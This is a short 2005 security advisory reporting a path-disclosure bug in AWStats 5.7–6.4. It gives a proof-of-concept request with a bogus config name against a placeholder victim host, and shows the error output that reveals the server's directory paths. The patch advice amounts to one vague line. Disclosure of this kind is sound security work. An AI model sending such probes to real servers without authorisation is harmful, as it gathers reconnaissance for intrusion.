************************************************************** * sile001 advisory * * * * PRODUCT: AWStats * * VERSION: 5.7 - 6.4 * * VENDOR: http://awstats.sourceforge.net * * VULNERABILITY: Path Disclosure * * RISK: Low * * * * Found by: Silentium of Anacron Group Italy * * date: 24/02/2005 * * e-mail: anacrongroupitaly[at]autistici[dot]org * * my_home: http://www.autistici.org/anacron-group-italy * * * ************************************************************** General product info -------------------- AWStats (Advanced Web Statistics) is a powerful, full-featured web server logfile analyzer which shows you all your Web statistics. It works with IIS 5.0+, Apache and all major web, wap, proxy, streaming server log files (and even ftp servers or mail logs) on all Operating Systems. Current version is the 6.4. General bug info ---------------- I have found a bug that show in error message the current path of http daemon. For PoC you write how argument of variable 'config' an not exist name refered at own config file. Exploiting this bug ------------------- Input in your browser: http://www.victim.com/cgi-bin/awstats.pl?config=silentium Output from web server: Error: Couldn't open config file "awstats.silentium.conf" nor "awstats.conf" after searching in path "/var/www/cgi-bin,/etc/awstats, /usr/local/etc/awstats,/etc,/etc/opt/awstats": No such file or directory - Did you use the correct URL ? Example: http://localhost/awstats/awstats.pl?config=mysite Example: http://127.0.0.1/cgi-bin/awstats.pl?config=mysite - Did you create your config file 'awstats.silentium.conf' ? If not, you can run "/var/www/cgi-bin/tools/awstats_configure.pl" from command line, or create it manually. Check config file, permissions and AWStats documentation (in 'docs' directory). --- You see the path of the web server: /var/www/cgi-bin Patching this bug ----------------- You search in source code the variable $config and trace it.